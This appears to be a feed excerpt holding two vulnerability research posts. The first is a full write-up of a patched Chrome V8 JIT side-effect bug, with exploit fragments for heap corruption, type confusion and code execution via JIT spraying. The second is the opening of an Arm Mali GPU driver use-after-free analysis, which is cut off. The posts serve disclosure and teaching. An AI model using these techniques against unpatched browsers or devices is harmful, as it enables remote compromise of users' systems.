The current vulnerability exists in the JIT compiler in Chrome, which optimizes Javascript functions based on previous knowledge of the input types (for example, number types, array types, etc.). This is called speculative optimization and care must be taken to make sure that these assumptions on the inputs are still valid when the optimized code is used. The complexity of the JIT engine has led to many security issues in the past and has been a popular target for attackers. The phrack article, “Exploiting Logic Bugs in JavaScript JIT Engines” by Samuel Groß is a very good introduction to the topic.

The JIT compiler in Chrome

The JIT compiler in Chrome’s v8 Javascript engine is called TurboFan. Javascript functions in Chrome are optimized according to how often they are used. When a Javascript function is first run, bytecode is generated by the interpreter. As the function is called repeatedly with different inputs, feedback about these inputs, such as their types (for example, are they integers, or objects, etc.), is collected. After the function is run enough times, TurboFan uses this feedback to compile optimized code for the function, where assumptions are made based on the feedback to optimize the bytecode. After this, the compiled optimized code is used to execute the function. If these assumptions become incorrect after the function is optimized (for example, new input is used with a type that is different to the feedback), then the function will be deoptimized, and the slower bytecode is used again. Readers can consult, for example, “An Introduction to Speculative Optimization in V8” by Benedikt Meurer for more details of how the compilation process works.

TurboFan itself is a well-studied subject and there is a vast amount of literature out there documenting its inner workings, so I’ll only go through the background that is needed for this article. The article, “Introduction to TurboFan” by Jeremy Fetiveau is a great write-up that covers the basics of TurboFan and will be very useful for understanding the context in this post, although I’ll also cover the necessary material. The phrack article, “Exploiting Logic Bugs in JavaScript JIT Engines” by Samuel Groß also covers many aspects of TurboFan and V8 object layouts that are relevant.

Nodes and side effects

When compiling optimized JIT code, TurboFan first visits each bytecode instruction in the function, and then transforms each of these instructions into a collection of nodes (a process known as reduction), which results in a representation called a “Sea of Nodes.” The nodes are related to each other via dependencies, which are represented as edges in Turbolizer, a tool that is commonly used to visualize the sea of nodes. There are three types of edges: the control edges represent the control flow graph, value edges represent the dataflow graph, and the effect edges, which order nodes according to how they access the state of objects.

For example, in the following:

x.a = 0x41;
var y = x.a;

The operation y = x.a has an effect dependency on x.a = 0x41 and must be performed after x.a = 0x41 because x.a = 0x41 changes the state of x, which is used in y = x.a. Effect edges are important for eliminating checks in the optimized code.

In Chrome, the memory layout, in particular, the offsets of the fields in an object, is specified by its Map, which can be thought of as the type information of the object, and knowledge of Map from feedback is often used by TurboFan to optimize code. (Readers can consult, for example, “JavaScript engine fundamentals: Shapes and Inline Caches” by Mathias Bynens for more details. For the purpose of this post, however, it is sufficient to know that Map determines the field offsets of an object.)

Let’s look a bit closer at how dependency checks are inserted, using this function as the running example:

function foo(obj) {
  var y = obj.x;
  obj.x = 1;
  return y;
}

When accessing the field x of obj, TurboFan uses previous inputs of the parameter obj to speculate the memory layout (determined by the Map of obj) and emits optimized code to access x. Of course, obj with a different Map may be used when calling foo after it is optimized, and so a CheckMaps node is created in the function to make sure that obj has the correct memory layout before the field x is accessed by the optimized code. This can be seen in the graph generated from Turbolizer:

Turbolizer graph showing CheckMaps is inserted before field is load

Likewise, when storing to x in the line obj.x = 1, the optimized code assumes obj has the correct map. However, because the map of obj is checked prior to var y = obj.x and there is nothing between these two lines that can change obj, there is no need to recheck the map. Indeed, TurboFan does not generate an extra CheckMaps prior to the StoreField node used in obj.x = 1:

Turbolizer graph showing CheckMaps is omitted before a subsequent store

However, nodes can sometimes have side effects, where it may change an object indirectly. For example, a node that invokes a call to a user defined Javascript function can potentially change any object:

function foo(obj) {
  var y = obj.x;
  callback();
  obj.x = 1;
  return y;
}

When a function call is inserted between the accesses to x, the map of obj may change after callback is called and so a CheckMaps is needed prior to the store access obj.x = 1:

Turbolizer graph showing a CheckMaps is inserted after a side-effect call
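This is easy to demonstrate from plain Javascript: nothing stops the callback from transitioning obj to a different map between the two accesses (a minimal sketch, with callback passed as a parameter for clarity):

```javascript
// The callback really can change obj's map between the two accesses, which is
// why the optimized code needs a second CheckMaps before the store.
function foo(obj, callback) {
  var y = obj.x;
  callback();      // side effect: may transition obj to a different map
  obj.x = 1;       // the map of obj must be re-checked here
  return y;
}

const o = { x: 5 };
const y = foo(o, () => { delete o.x; o.y = 2; });  // map changes inside the callback
// y is 5 (read before the callback); afterwards o has both y and a re-added x
```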

In TurboFan, side effects of a node are indicated by node properties. In particular, the kNoWrite property indicates that the node has no side effect:

class V8_EXPORT_PRIVATE Operator : public NON_EXPORTED_BASE(ZoneObject) {
 public:
  ...
  enum Property {
    ...
    kNoWrite = 1 << 4,  // Does not modify any Effects and thereby
                        // create new scheduling dependencies.
    ...
};

In the above, the call to callback creates a Call node which has the kNoProperties property, which indicates that it can have side effects (instead of kNoWrite, which indicates no side effects).

Compilation dependencies

Assumptions that are made in the optimized code compiled by TurboFan can also become invalid at a later time. In the following example, the function foo has only seen the input a, which has a field x that is constant (that is, the field has not been reassigned):

var a = {x : 1};

function foo(obj) {
  var y = obj.x;
  return y;
}
%PrepareFunctionForOptimization(foo);
foo(a);
%OptimizeFunctionOnNextCall(foo);
foo(a);

When TurboFan compiles the function foo, it assumes that the field x of obj is the constant 1 and simply replaces obj.x with 1. However, this assumption can change in a later time. For example, if I reassign the field x in obj after compilation, then the compiled code would become invalid:

var a = {x : 1};

function foo(obj) {
  var y = obj.x;
  return y;
}
%PrepareFunctionForOptimization(foo);
foo(a);
%OptimizeFunctionOnNextCall(foo);
foo(a);
//Invalidates the optimized code
a.x = 2;

The trace-deopt flag in the standalone d8 binary can be used to check that the code does indeed becomes invalid:

$./d8 --allow-natives-syntax --trace-turbo --trace-deopt foo.js
Concurrent recompilation has been disabled for tracing.
---------------------------------------------------
Begin compiling method foo using TurboFan
---------------------------------------------------
Finished compiling method foo using TurboFan
[marking dependent code 0x1a69002021a5 <Code TURBOFAN> (0x1a690019b9e9 <SharedFunctionInfo foo>) (opt id 0) for deoptimization, reason: code dependencies]

Note the last console output, which marks the function foo for deoptimization, meaning that the optimized code of foo has been invalidated. When foo is run after the line a.x = 2, the unoptimized code will be used instead. Deoptimization that happens when other code invalidates an optimized function is called "lazy deoptimization," as it only takes effect the next time the function runs. Note also that the reason for the deoptimization in the last line is code dependencies. Code dependencies are a mechanism employed by TurboFan to ensure that optimized code is invalidated if its assumptions change after the code is compiled.

Under the hood, code dependencies are implemented via the CompilationDependency class. Its subclasses are responsible for making sure that the optimized code is invalidated when the respective assumption becomes invalid. In the above example, the FieldConstnessDependency is responsible for invalidating the optimized code when the constant field, x, in obj is reassigned.

The CompilationDependency class has three virtual methods, IsValid, PrepareInstall, and Install that are called at the end of the compilation. The IsValid method checks that the assumption is still valid at the end of the compilation, while Install establishes a mechanism to invalidate the code when the assumption changes.

Concurrent compilation

Concurrent compilation is a feature that was enabled in version 95 of Chrome. It enables TurboFan to compile optimized code in a background thread while the main thread is running other Javascript code. This, however, also opens up the possibility of race conditions between compilation and Javascript execution. On the one hand, Javascript executed in the main thread may invalidate assumptions made during compilation after those assumptions are checked. While many such issues are prevented by compilation dependencies, this type of race has still resulted in some security issues in the past. (For example, issue 1369871 and issue 1211215.)

On the other hand, if compilation makes changes to Javascript objects, it may also cause inconsistencies in the Javascript code that is running in the main thread. This is a rather unusual situation, as compilation rarely modifies Javascript objects. However, the PrepareInstall method of the CompilationDependency subclass PrototypePropertyDependency calls the EnsureHasInitialMap method, which does make changes to function, a Javascript Function object.


void PrepareInstall(JSHeapBroker* broker) const override {
  SLOW_DCHECK(IsValid(broker));
  Handle<JSFunction> function = function_.object();
  if (!function->has_initial_map()) JSFunction::EnsureHasInitialMap(function);
}
...

Amongst other things, EnsureHasInitialMap calls Map::SetPrototype on the prototype field of function. Calling Map::SetPrototype on an object can cause its layout to be optimized via the OptimizeAsPrototype call. In particular, if an object is a "fast" object that stores its fields as an array, OptimizeAsPrototype will change it into a "dictionary" object that stores its fields in a dictionary. (See, for example, Section 3.2 in "Exploiting Logic Bugs in JavaScript JIT Engines"; setting an object as the __proto__ field of another object has the same effect as calling Map::SetPrototype on it.)

As explained before, PrepareInstall is called at the end of the compilation phase, so initially I thought this could be exploited as a race condition to create a primitive similar to CVE-2018-17463, detailed in "Exploiting Logic Bugs in JavaScript JIT Engines." After some debugging, I discovered that the PrepareInstall method is actually executed on the main thread, so this is not really a race condition.

Interrupt handling in V8

Although the PrepareInstall method is executed in the main thread, what is interesting is how the main thread switches between different tasks. In particular: how does the background thread notify the main thread to install the compilation dependency after the optimized code is compiled, and when can the main thread switch between normal Javascript execution and handling of tasks requested by other threads? It turns out that this is done via the StackGuard::HandleInterrupts method. In particular, when the compilation is finished in the background, an INSTALL_CODE task is put on a queue, which is then handled in HandleInterrupts in the main thread.

While the main thread is executing Javascript code, it checks for these interrupts at particular places by calling StackGuard::HandleInterrupts. This only happens at a limited number of places, for example, at the entry point of a Javascript function.

While looking for callers of StackGuard::HandleInterrupts, I discovered that the StackCheck node, which has the kNoWrite property, can in fact call StackGuard::HandleInterrupts. The optimized code for the StackCheck can make a call to the Runtime::kStackGuard function:

void JSGenericLowering::LowerJSStackCheck(Node* node) {
  Node* effect = NodeProperties::GetEffectInput(node);
  Node* control = NodeProperties::GetControlInput(node);
  ...
  if (stack_check_kind == StackCheckKind::kJSFunctionEntry) {
    node->InsertInput(zone(), 0,
                      graph()->NewNode(machine()->LoadStackCheckOffset()));
    ReplaceWithRuntimeCall(node, Runtime::kStackGuardWithGap);
  } else {
    ReplaceWithRuntimeCall(node, Runtime::kStackGuard);
  }
}

which in turn calls HandleInterrupts:

RUNTIME_FUNCTION(Runtime_StackGuard) {
  ...
  return isolate->stack_guard()->HandleInterrupts(
      StackGuard::InterruptLevel::kAnyEffect);
}

As mentioned previously, kNoWrite is used to indicate that a node does not make changes to Javascript objects. However, because StackCheck can call HandleInterrupts, which could cause the prototype field of a function to change from a fast object to a dictionary object, this kNoWrite property is incorrect, and the StackCheck node can be used to change an object and bypass security checks in a way that is similar to CVE-2018-17463. The problem now is to figure out how to insert a StackCheck node in the TurboFan graph.

It turns out that the JumpLoop opcode that is inserted at the end of a loop iteration can be used to insert a StackCheck node:

void BytecodeGraphBuilder::VisitJumpLoop() {
  BuildIterationBodyStackCheck();
  BuildJump();
}

In the above, BuildIterationBodyStackCheck introduces a StackCheck node in the graph:

void BytecodeGraphBuilder::BuildIterationBodyStackCheck() {
  Node* node =
      NewNode(javascript()->StackCheck(StackCheckKind::kJSIterationBody));
  environment()->RecordAfterState(node, Environment::kAttachFrameState);
}

The idea is that, if a function is running a loop for a potentially long time, then it should check for interrupts after a number of iterations are run, in case it is blocking other operations. This means that, by creating a loop that runs for a large number of iterations, I can cause an optimized function to handle interrupts and potentially call EnsureHasInitialMap to change the layout of a Javascript object. So, to exploit the bug, I need to create two functions with the following properties:

  1. A function bar that has the PrototypePropertyDependency when optimized, so that when HandleInterrupts is called, EnsureHasInitialMap is called and the prototype field of another function B (for the purpose of the exploit, I use a class constructor) will change from being a fast object to a dictionary object.
  2. A function foo with a loop that accesses fields in the prototype field of the class constructor B both before and after the loop. The optimized code of foo that accesses B.prototype before the loop will insert a CheckMaps node to make sure the Map of B.prototype is correct. As the loop introduces a StackCheck node, it may call HandleInterrupts, which will change the Map of B.prototype. However, because StackCheck is marked with kNoWrite, a CheckMaps will not be inserted again prior to accessing properties of B.prototype after the loop. This results in optimized code accessing fields in B.prototype with incorrect offsets.
  3. Optimize foo and wait until concurrent compilation is finished to make sure that foo is executed with optimized code from now on.
  4. Run bar enough times to trigger concurrent compilation, and then run foo immediately. As long as the loop in foo is running long enough, the compilation of bar will finish while the loop is running and the compiler thread will queue an INSTALL_CODE task. The loop in foo will then handle this interrupt, which will call EnsureHasInitialMap for B to change B.prototype into a dictionary object. After the loop is finished, subsequent accesses to fields of B.prototype will be done using the wrong Map (by assuming that B.prototype is still a fast object).

This can then be exploited by causing an out-of-bounds (OOB) access in a Javascript object.

Exploiting the bug

The function bar can be created by looking for nodes that introduce a PrototypePropertyDependency, such as the JSOrdinaryHasInstance node that is introduced when using instanceof in Javascript. For example, the following function:

function bar(x) {
  return x instanceof B;
}

will have a PrototypePropertyDependency that changes B.prototype to a dictionary object when bar is installed.

The function foo can be constructed as follows:

function foo(obj, proto, x, y) {
  //Introduce `CheckMaps` for `proto`
  obj.obj = proto;
  var z = 0;
  //Loop for handling interrupt
  for (let i = 0; i < 1; i++) {
    for (let j = 0; j < x; j++) {
      for (let k = 0; k < x; k++) {
        z = y[k];
      }
    }
  }
  //Access after map changed
  proto.b = 33;
  return z;
}

When proto is stored to an object field that is known to hold objects of a fixed map, a CheckMaps node is introduced to make sure that proto has the expected map. So, by passing foo a constant obj of the following form:

var obj = {obj: B.prototype};

I can introduce the CheckMaps node for B.prototype that I need in foo. After running the loop that handles the interrupt from bar, the field write proto.b = 33 will be writing to proto based on its fast map while it has already been changed into a dictionary map.

To exploit this, we need to understand the differences between fast objects and dictionary objects. The section "FixedArray and NumberDictionary Memory Layout" in "Patch-gapping Google Chrome" gives good details about this.

A fast object either stores fields within the object itself (in-object properties) or, when space runs out for in-object properties, in a PropertyArray. In our case, B.prototype does not have any in-object properties and uses a PropertyArray to store its fields. A PropertyArray has three header fields, map, length, and hash, which are at offsets 0, 4, and 8. Its elements start at offset 0xc and are of size 4. When optimized code accesses properties in B.prototype, it uses the element offset of the field in the PropertyArray to access the field directly. For example, in the following, when loading B.prototype.a, optimized code will load the element at offset 0xc from the PropertyArray, and the element at offset 0x10 for the field b:

class B {}
B.prototype.a = 1;
B.prototype.b = 2;

A dictionary object, on the other hand, stores fields in a NamedDictionary. A NamedDictionary is implemented using a FixedArray; however, its element size and header size are different. It has the map and length fields, but not the hash field of a PropertyArray. In addition, a NamedDictionary has some extra fields, including elements, deleted, and capacity. In particular, when optimized code uses the field offsets from a PropertyArray to access a NamedDictionary, these extra fields can be overwritten. This, for example, can be used to overwrite the capacity of the NamedDictionary to cause an out-of-bounds access.

The memory layout of PropertyArray and NamedDictionary

In the above, the field offset for field b in a PropertyArray aligns with that of capacity in the NamedDictionary and so writing to b will overwrite the capacity of the NamedDictionary. Since capacity is used in most bound calculations when accessing a NamedDictionary, this can be used to cause an OOB access.

As pointed out in "Patch-gapping Google Chrome" and "Exploiting Logic Bugs in JavaScript JIT Engines," the main problem with exploiting an OOB access in a NamedDictionary is that, when looking for a key in the dictionary, a random hash is used to translate the key to an index. This randomness causes the layout of the dictionary to change with each run, and accessing properties with the same key will result in an access at a random offset in the dictionary, which is unreliable and may result in a crash.

To overcome this, I adopted the solution in "Patch-gapping Google Chrome," which is to set the capacity to a power of two plus one. This causes any key access to the dictionary object to either access the NamedDictionary at offset 0, or at the offset capacity. By placing objects carefully, I can use the dictionary to access an object placed at the offset capacity. While this is not 100% reliable, as there is a chance of accessing an object at offset 0, the failure does not cause a crash and can be easily detected. So, in case of a failure, I just have to reload the page to reinitialize the random hash and try again. (Another way to exploit this is to follow the approach in Section 4 of "Exploiting Logic Bugs in JavaScript JIT Engines.")

A NamedDictionary stores its elements in tuples of the form (Key, Value, Attribute). When accessing an element with key k, the dictionary first converts k into an index. In our case, the index is either 0 or the capacity of the dictionary. It then checks that the element at that index has the same Key as k; if it does, Value is returned. So, in order to make a successful access, I need to create a fake NamedDictionary entry at the offset capacity. This can be achieved by placing a fast object after the dictionary and using its field values to create the fake entry: a fast object stores its fields in a PropertyArray, which stores field values consecutively. By choosing the field values carefully, so that the field value at the capacity offset of the NamedDictionary takes the value of the key k, the next value will be returned when the field k is accessed in the dictionary object:

Memory alignment between corrupted NamedDictionary and object properties

For example, in the above, an object placed after the corrupted NamedDictionary will have some of its fields, vn, vn+1 and vn+2 stored at the offset corresponding to the corrupted capacity of the dictionary. Accessing the field with key k has a chance of interpreting vn, vn+1 and vn+2 as a fake element tuple (Key = vn, value = vn+1, Attribute = vn+2). By setting vn to k, vn+1 will be returned as the field k of the corrupted dictionary object. The significance of this is that I can now use the corrupted dictionary to create a type confusion.

Creating type confusion

The exploit flow now very much follows that of Section 4 in "Exploiting Logic Bugs in JavaScript JIT Engines." In order to create a type confusion, I'll use another optimization in TurboFan. When loading an object property, if the property is known to be an object with a fixed Map, then TurboFan will omit the CheckMaps for the property when it is accessed. For example, in the following function:

function tc(x) {
  var obj = x.p1.px;
  obj.x = 100;
}
var obj0 = {px : {x : 1}};
var obj1 = {p0 : str0, p1 : obj0, p2 : 0};
//optimizing tc
for (let i = 0; i < 20000; i++) {
  tc(obj1);
}

Because tc has only seen obj1 as an input when it is optimized, a CheckMaps will be inserted to check that x has the same Map as obj1. However, as obj1.p1 has the same Map (the Map of obj0) throughout, a CheckMaps is not inserted to check the Map of x.p1. In this case, the Map of x.p1 is ensured by checking the Map of x, as well as installing a compilation dependency that prevents it from changing. However, if I am able to use a memory corruption, such as the OOB access I constructed with the dictionary object, to modify the field p1 in obj1, then I can bypass these checks and cause the optimized code to access obj with a wrong Map. In particular, I can replace obj0.px by an Array object, causing obj.x = 100 to overwrite the length of the Array:

var corrupted_arr = [1.1];
var corrupted = {a : corrupted_arr};
...
//Overwrite `obj1.p1` to `corrupted`
Object.defineProperty(B.prototype, 'aaa', {value : corrupted, writable : true});
//obj.x = 100 in `tc` now overwrites length of `corrupted_arr`
tc(obj1);

In the above, I first use the bug to overwrite the capacity of the dictionary object B.prototype. I then align objects by placing obj0 behind B.prototype, such that the field aaa in B.prototype now gives me obj0.px. Then, by overwriting aaa in B.prototype, I can change obj1.p1 to a different object with a different Map. As this change does not involve setting a property in obj1, it does not invalidate the optimized code in the function tc. So, when tc is run again, a type confusion occurs and obj = x.p1.px will return corrupted_arr and setting obj.x = 100 will set the length of corrupted_arr to 100.

Field alignments of various type confused objects

The above figure shows the field alignments between the objects.

Gaining code execution

Once an OOB access of a double array is achieved, the bug can be exploited as follows:

  1. Place an Object Array after corrupted_arr, and use the OOB read primitive to read the addresses of the objects stored in this array. This allows me to obtain the address of any V8 object.
  2. Place another double array, writeArr after corrupted_arr, and use the OOB write primitive in corrupted_arr to overwrite the element field of writeArr to an object address. Accessing the elements of writeArr then allows me to read/write to arbitrary addresses.
  3. While this gives me arbitrary read and write primitives within the V8 heap, as well as the address of any object, the recently introduced heap sandbox in V8 isolates the V8 heap fairly well, so I still won't be able to access arbitrary memory within the renderer process. In particular, I can no longer use the standard method of overwriting the RWX pages that are used for storing WebAssembly code to achieve code execution. Instead, JIT spraying can be used to bypass the heap sandbox.
  4. The idea of JIT spraying is that a pointer to the JIT-optimized code of a function is stored in a Javascript Function object. By modifying this pointer using the arbitrary read and write primitives within the V8 heap, I can make it point into the middle of the JIT code. If I use data structures, such as a double array, to store shellcode as floating point numbers in the JIT code, then jumping to these data structures allows me to execute arbitrary code. I refer readers to this post for more details.

The exploit can be found here with some set up notes.

Conclusion

Incorrect side effect modeling has long been a powerful exploit primitive and has been exploited multiple times, for example, in CVE-2018-17463 and CVE-2020-6418. In this case, the side effect property of the StackCheck node has become incorrect due to the introduction of concurrent compilation. This shows how delicate interactions between different and seemingly unrelated parts of Chrome can violate previous assumptions, resulting in often subtle and hard-to-detect issues.

The post Getting RCE in Chrome with incorrect side effect in the JIT compiler appeared first on The GitHub Blog.

Rooting with root cause: finding a variant of a Project Zero bug https://github.blog/security/vulnerability-research/rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug/ Thu, 25 May 2023 16:00:59 +0000 https://github.blog/?p=72040 In this blog, I’ll look at CVE-2022-46395, a variant of CVE-2022-36449 (Project Zero issue 2327), and use it to gain arbitrary kernel code execution and root privileges from the untrusted app domain on an Android phone that uses the Arm Mali GPU. I’ll also explain how root cause analysis of CVE-2022-36449 led to the discovery of CVE-2022-46395.

In this blog, I’ll look at CVE-2022-46395, a variant of Project Zero issue 2327 (CVE-2022-36449) and show how it can be used to gain arbitrary kernel code execution and root privileges from the untrusted app domain on an Android phone that uses the Arm Mali GPU. I used a Pixel 6 device for testing and reported the vulnerability to Arm on November 17, 2022. It was fixed in the Arm Mali driver version r42p0, which was released publicly on January 27, 2023, and fixed in Android in the May security update. I’ll go through imported memory in the Arm Mali driver, the root cause of Project Zero issue 2327, as well as exploiting a very tight race condition in CVE-2022-46395. A detailed timeline of this issue can be found here.

Imported memory in the Arm Mali driver

The Arm Mali GPU can be integrated in various devices (for example, see “Implementations” in the Mali (GPU) Wikipedia entry). It has been an attractive target on Android phones and has been targeted by in-the-wild exploits multiple times.

In September 2022, Jann Horn of Google’s Project Zero disclosed a number of vulnerabilities in the Arm Mali GPU driver that were collectively assigned CVE-2022-36449. One of the issues, 2327, is particularly relevant to this research.

When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle.

In particular, the kbase_context manages different types of memory that are shared between the GPU devices and user space applications. The Mali driver provides the KBASE_IOCTL_MEM_IMPORT ioctl that allows users to share memory with the GPU via direct I/O (see, for example, the “Performing Direct I/O” section here). In this setup, the shared memory is owned and managed by the user space application. While the kernel driver is using the memory, the get_user_pages function is used to increase the refcount of the user page so that it does not get freed while the kernel is using it.

Memory imported from user space using direct I/O is represented by a kbase_va_region with the KBASE_MEM_TYPE_IMPORTED_USER_BUF kbase_memory_type.

A kbase_va_region in the Mali GPU driver represents a shared memory region between the GPU device and the host device (CPU). It contains information such as the range of the GPU addresses and the size of the region. It also contains two kbase_mem_phy_alloc pointer fields, cpu_alloc and gpu_alloc, that are responsible for keeping track of the memory pages that are mapped to the GPU. In our setting, these two fields point to the same object, so I’ll only refer to them as the gpu_alloc from now on, and code snippets that use cpu_alloc should be understood to apply to the gpu_alloc as well. The kbase_mem_phy_alloc contains an array, pages, that keeps track of the pages that are currently being used by the GPU.

For KBASE_MEM_TYPE_IMPORTED_USER_BUF type of memory, the pages array in gpu_alloc is populated by using the get_user_pages function on the pages that are supplied by the user. This function increases the refcount of those pages, and then adds them to the pages array while they are in use by the GPU, and then removes them from pages and decreases their refcount once the GPU is no longer using the pages. This ensures that the pages won’t be freed while the GPU is using them.

Depending on whether the user passes the KBASE_REG_SHARED_BOTH flag when the memory is imported via the KBASE_IOCTL_MEM_IMPORT ioctl, the user pages are either added to pages when the memory region is imported (when KBASE_REG_SHARED_BOTH is set), or they are only added to pages when the memory is used at a later stage.

In the case where pages are populated when the memory is imported, the pages cannot be removed until the kbase_va_region and its gpu_alloc is freed. When KBASE_REG_SHARED_BOTH is not set and the pages are populated “on demand,” the memory management becomes more interesting.

Project zero issue 2327 (CVE-2022-36449)

When the pages of a KBASE_MEM_TYPE_IMPORTED_USER_BUF are not populated at import time, the memory can be used by submitting a GPU software job (“softjob”) that uses the imported memory as an external resource. I can submit a GPU job via the KBASE_IOCTL_JOB_SUBMIT ioctl with the BASE_JD_REQ_EXTERNAL_RESOURCES requirement, and specify the GPU address of the shared user memory as its external resource:

struct base_external_resource extres = {
  .ext_resource = user_buf_addr            //<------ GPU address of the imported user buffer
};
struct base_jd_atom atom1 = {
  .atom_number = 0,
  .core_req = BASE_JD_REQ_EXTERNAL_RESOURCES,
  .nr_extres = 1,
  .extres_list = (uint64_t)&extres,
  ...
};
struct kbase_ioctl_job_submit js1 = {
  .addr = (uint64_t)&atom1,
  .nr_atoms = 1,
  .stride = sizeof(atom1)
};
ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &js1);

When a software job requires external memory resources that are mapped as KBASE_MEM_TYPE_IMPORTED_USER_BUF, the function kbase_jd_user_buf_map is called to insert the user pages into the pages array of the gpu_alloc of the kbase_va_region via the kbase_jd_user_buf_pin_pages call:

static int kbase_jd_user_buf_map(struct kbase_context *kctx,
        struct kbase_va_region *reg)
{
    ...
    int err = kbase_jd_user_buf_pin_pages(kctx, reg);   //<------ inserts user pages
    ...
}

At this point, the user pages have their refcount incremented by get_user_pages and the physical addresses of their underlying memory are inserted into the pages array.

Once the software job finishes using the external resources, kbase_jd_user_buf_unmap is used for removing the user pages from the pages array and then decrementing their refcounts.

The pages array, however, is not the only way that these memory pages may be accessed. The kernel driver may also create memory mappings for these pages that allow them to be accessed from the GPU and the CPU, and these memory mappings should be removed before the pages are removed from the pages array. For example, kbase_unmap_external_resource, the caller of kbase_jd_user_buf_unmap, takes care to remove the memory mappings in the GPU by calling kbase_mmu_teardown_pages:

void kbase_unmap_external_resource(struct kbase_context *kctx,
        struct kbase_va_region *reg, struct kbase_mem_phy_alloc *alloc)
{
    ...
    case KBASE_MEM_TYPE_IMPORTED_USER_BUF: {
        alloc->imported.user_buf.current_mapping_usage_count--;
        if (alloc->imported.user_buf.current_mapping_usage_count == 0) {
            bool writeable = true;
            if (!kbase_is_region_invalid_or_free(reg) &&
                    reg->gpu_alloc == alloc)
                kbase_mmu_teardown_pages(kbdev,
                        &kctx->mmu,
                        reg->start_pfn,
                        kbase_reg_current_backed_size(reg),
                        kctx->as_nr);
            if (reg && ((reg->flags & (KBASE_REG_CPU_WR | KBASE_REG_GPU_WR)) == 0))
                writeable = false;
            kbase_jd_user_buf_unmap(kctx, alloc, writeable);
        }
    }
    ...
}

It is also possible to create mappings from these user space pages to the CPU by calling mmap on the Mali driver's file with an appropriate page offset. When the user pages are removed, these CPU mappings should be removed by calling the kbase_mem_shrink_cpu_mapping function to prevent them from being accessed through the mmap'ed user space addresses. This, however, was not done when user pages were removed from a KBASE_MEM_TYPE_IMPORTED_USER_BUF memory region, meaning that, once the refcounts of these user pages were reduced in kbase_jd_user_buf_unmap, the pages could be freed while CPU mappings created by the Mali driver still pointed to them. This, in particular, meant that after these pages were freed, they could still be accessed from the user application, creating a use-after-free condition for memory pages that was easy to exploit.

Root cause analysis can sometimes be more of an art than a science, and there can be many valid but different views of what causes a bug. While at one level it may look like a simple case of missing cleanup logic when the imported user memory is removed, the bug also highlights an interesting deviation in how imported memory is managed in the Mali GPU driver.

In general, shared memory in the Mali GPU driver is managed via the gpu_alloc of the kbase_va_region, and there are two different cases in which the backing pages of a region can be freed. First, if the gpu_alloc and the kbase_va_region themselves are freed, then the backing pages of the kbase_va_region are also freed. To prevent this from happening while the backing pages are used by the kernel, references to the corresponding gpu_alloc and kbase_va_region are usually taken to keep them from being freed. When a CPU mapping is created via kbase_cpu_mmap, a kbase_cpu_mapping structure is created and stored as the vm_private_data of the created virtual memory (vm) area. The kbase_cpu_mapping stores and increases the refcount of both the kbase_va_region and the gpu_alloc, preventing them from being freed while the vm area is in use.

static int kbase_cpu_mmap(struct kbase_context *kctx,
        struct kbase_va_region *reg,
        struct vm_area_struct *vma,
        void *kaddr,
        size_t nr_pages,
        unsigned long aligned_offset,
        int free_on_close)
{
    struct kbase_cpu_mapping *map;
    int err = 0;
    map = kzalloc(sizeof(*map), GFP_KERNEL);
    ...
    vma->vm_private_data = map;
    ...
    map->region = kbase_va_region_alloc_get(kctx, reg);
    ...
    map->alloc = kbase_mem_phy_alloc_get(reg->cpu_alloc);
    ...
}

When the memory region is of type KBASE_MEM_TYPE_NATIVE, its backing pages are owned and maintained by the memory region, and the backing pages can also be freed by shrinking the backing store. For example, the KBASE_IOCTL_MEM_COMMIT ioctl calls kbase_mem_shrink to remove the backing pages:

int kbase_mem_shrink(struct kbase_context *const kctx,
        struct kbase_va_region *const reg, u64 new_pages)
{
    ...
    err = kbase_mem_shrink_gpu_mapping(kctx, reg,
            new_pages, old_pages);
    if (err >= 0) {
        /* Update all CPU mapping(s) */
        kbase_mem_shrink_cpu_mapping(kctx, reg,
                new_pages, old_pages);
        kbase_free_phy_pages_helper(reg->cpu_alloc, delta);
        ...
    }
    ...
}

In the above, both kbase_mem_shrink_gpu_mapping and kbase_mem_shrink_cpu_mapping are called to remove potential uses of the backing pages before they are freed. As kbase_mem_shrink frees the backing pages by calling kbase_free_phy_pages_helper, it only makes sense to shrink a region whose backing store is owned by the GPU. Even in this case, care must be taken to remove potential references to the backing pages before freeing them. For other types of memory, references to the backing pages may exist outside of the memory region, so resizing it is generally forbidden and the pages array is immutable throughout the lifetime of the gpu_alloc. In this case, the backing pages should live as long as the gpu_alloc.

This makes the semantics of the KBASE_MEM_TYPE_IMPORTED_USER_BUF region interesting. While its backing pages are owned by the user space application that creates it, as we have seen, its backing store, which is stored in the pages array of its gpu_alloc, can indeed change, and backing pages can be freed while the gpu_alloc is still alive. Recall that if KBASE_REG_SHARED_BOTH is not set when the region is created, its backing store will only be set when the region is used as an external resource in a GPU job, at which point kbase_jd_user_buf_pin_pages is called to insert user pages into its backing store:

static int kbase_jd_user_buf_map(struct kbase_context *kctx,
        struct kbase_va_region *reg)
{
    ...
    int err = kbase_jd_user_buf_pin_pages(kctx, reg);   //<------ inserts user pages
    ...
}

The backing store then shrinks back to zero after the job has finished using the memory region by calling kbase_jd_user_buf_unmap. This, as we have seen, can result in cleanup logic from kbase_mem_shrink being omitted by mistake due to the need to reimplement complex memory management logic. However, this also means the backing store of a region can be removed without going through kbase_mem_shrink or freeing the region, which is unusual and may break the assumptions made in other parts of the code.

CVE-2022-46395

The idea is to look for code that accesses the backing store of a memory region and see if it implicitly assumes that the backing store is only removed when one of the following happens:

  1. When the memory region is freed, or
  2. When the backing store is shrunk by the kbase_mem_shrink call

It turns out that the kbase_vmap_prot function had made these assumptions. The function kbase_vmap_prot is used by the driver to temporarily map the backing pages of a memory region to the kernel address space via vmap so that it can access them. It calls kbase_vmap_phy_pages to perform the mapping. To prevent the region from being freed while the vmap is valid, a kbase_vmap_struct is created for the lifetime of the mapping, which also holds a reference to the gpu_alloc of the kbase_va_region:

static int kbase_vmap_phy_pages(struct kbase_context *kctx,
        struct kbase_va_region *reg, u64 offset_bytes, size_t size,
        struct kbase_vmap_struct *map)
{
    ...
    map->cpu_alloc = reg->cpu_alloc;
    ...
    map->gpu_alloc = reg->gpu_alloc;
    ...
    kbase_mem_phy_alloc_kernel_mapped(reg->cpu_alloc);
    return 0;
}

